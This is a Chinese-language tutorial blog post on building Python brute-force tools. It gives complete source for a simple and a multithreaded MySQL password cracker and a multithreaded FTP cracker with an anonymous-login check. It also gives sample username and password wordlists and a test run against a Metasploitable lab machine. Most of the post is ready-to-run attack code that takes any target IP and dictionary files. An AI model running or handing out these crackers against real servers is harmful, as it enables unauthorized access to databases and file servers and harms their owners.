上一篇講到了如何用Python開發字典,而當我們手里有了字典
就可以進一步去做爆破的任務了,可以用現成的工具,當然也可以自己寫
接下來我就要一步一步來寫爆破工具!
爆破MySQL:
想要爆破MySQL目標至少要允許遠程連接
我這里沒有開啟遠程連接,只是爆破本地的MySQL
實際上,如果掌握了如何爆破本地MySQL,那么想要遠程爆破MySQL也是很輕松的
最基本的實現:
# -*-coding:utf-8 -*- import pymysql mysql_username = ('root', 'test', 'admin', 'user') mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user') success = False host = "127.0.0.1" port = 3306 for username in mysql_username: for password in mysql_password: try: db = pymysql.connect(host, username, password) success = True if success: print "用戶名:" + username + " 密碼:" + password + " 破解成功" except Exception, e: print "用戶名:" + username + " 密碼:" + password + " 破解失敗" pass
固定好哪些用戶名和哪些密碼,以及爆破的IP和端口,直接執行即可
進階的MySQL爆破腳本:寫的很完整,支持多線程
# -*-coding:utf-8 -*- """ MySQL爆破腳本 用法: python MysqlCrack2.py -H [目標IP] --u [用戶字典] --p [密碼字典] -P [端口] """ import re import socket import optparse import threading try: import pymysql except ImportError: print "[!] You need to install pymysql module!" print "[!] Usage:pip install pymysql" exit() result_user = None result_pass = None threads = [] def main(): """ 處理輸入參數 :return:None """ print "Welcome to MysqlCrack2" print "Author: Xuyiqing Version:1.0" parse = optparse.OptionParser( 'python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>') parse.add_option('-H', dest="target_host", type="string", help='specify the host') parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user') parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords') parse.add_option('-P', dest='port', type='int', help='specify the port') (options, args) = parse.parse_args() target_host = options.target_host user_dic = options.user_dic pwd_dic = options.pwd_dic port = options.port if target_host is not None and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target_host): mysql_brute(target_host, user_dic, pwd_dic, port) else: print "[!] Unknown IP\n" exit() def mysql_brute(host, user_dic, pwd_dic, port): """ MySQL暴力破解 :param host: 主機 :param user_dic: 用戶字典 :param pwd_dic: 密碼字典 :param port: 端口 :return: None """ print "[*] Target:" + host print "[*] Start cracking" userlist = None pwdlist = None try: socket.gethostbyname(host) except Exception: print '[*] Cannot connect to %s' % host exit() try: userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()] pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()] print "[*] Number of users:" + str(len(userlist)) print "[*] Number of passwords:" + str(len(pwdlist)) except Exception: print "[!] The path of the dictionary file is incorrect" exit() global threads for user in userlist: for pwd in pwdlist: t = threading.Thread(target=mysql_login, args=(host, user, pwd, port)) t.start() threads.append(t) def mysql_login(host, username, password, port): """ MySQL連接 :param host:主機 :param username:用戶名 :param password: 密碼 :param port: 端口 :return: None """ try: db = pymysql.Connect(host=host, port=port, user=username, passwd=password) print "[+] Success! User:" + username + " Password:" + password + "\n" global result_user, result_pass result_user = username result_pass = password db.close() exit() except Exception: print "[-] Fail! User:" + username + " Password:" + password + "\n" if __name__ == '__main__': main() for thread in threads: thread.join() if result_user is not None and result_pass is not None: print "[+] Result: %s - %s" % (result_user, result_pass) if result_user is None and result_pass is None: print "[+] Crack Fail"
FTP破解工具開發:
實際去安裝一些FTP軟件比較困難,我這里就用Metasploitable Linux
啟動后默認開啟FTP服務,我這里的IP是192.168.232.129
Metaploitable Linux的FTP可以匿名登陸,並且已知一個賬號密碼為:msfadmin-msfadmin
# -*-coding:utf-8 -*- import optparse import ftplib import threading import socket def anony_login(host): """ FTP匿名登陸 :param host:主機 :return: None """ try: ftp = ftplib.FTP(host) ftp.connect(host, 21, timeout=10) ftp.login('anonymous', 'test@qq.com') ftp.retrlines('LIST') ftp.quit() print "\n[*]" + str(host) + " FTP Anonymous Login Success" except Exception: print "\n[-]" + str(host) + " FTP Anonymous Login Fail" def ftp_login(host, username, password): """ 嘗試用戶密碼登陸FTP :param host:主機 :param username:用戶名 :param password:密碼 :return:None """ try: print "[-] Trying: " + username + "-" + password + "\n" ftp = ftplib.FTP(host) ftp.connect(host, 21, timeout=10) ftp.login(username, password) ftp.retrlines("LIST") ftp.quit() print "Success! " + username + " - " + password except ftplib.all_errors: pass def brute_force(host, users_file, pwds_file): """ 暴力破解 :param host: 主機 :param users_file:用戶字典 :param pwds_file: 密碼字典 :return: None """ users_f = open(users_file, 'r') pwds_f = open(pwds_file, 'r') for user in users_f.readlines(): pwds_f.seek(0) for password in pwds_f.readlines(): username = user.strip('\n') password = password.strip('\n') t = threading.Thread(target=ftp_login, args=(host, username, password)) t.start() def main(): """ 主函數,處理輸入參數 :return:None """ parser = optparse.OptionParser('usage%prog -H <target host> -u <users dictionary> -p <password dictionary>') parser.add_option('-H', dest='target_host', type='string', help='specify the host') parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user') parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords') (options, args) = parser.parse_args() host = options.target_host user_dic = options.user_dic pwd_dic = options.pwd_dic try: socket.gethostbyname(host) except Exception: print '[*] Cannot Resolve %s Unknown host' % host exit() anony_login(host) brute_force(host, user_dic, pwd_dic) if __name__ == '__main__': main()
使用的話,需要兩個字典:用戶字典和密碼字典,我隨便加入一些東西
username.txt
root
user
admin
msfadmin
manager
password.txt
pwd
password
userpass
msfadmin
manager
123456
實際使用:-H 輸入IP -u 用戶名字典 -p 密碼字典
結果:上邊已經找到匿名登陸,還有下圖的msfadmin,說明破解成功了
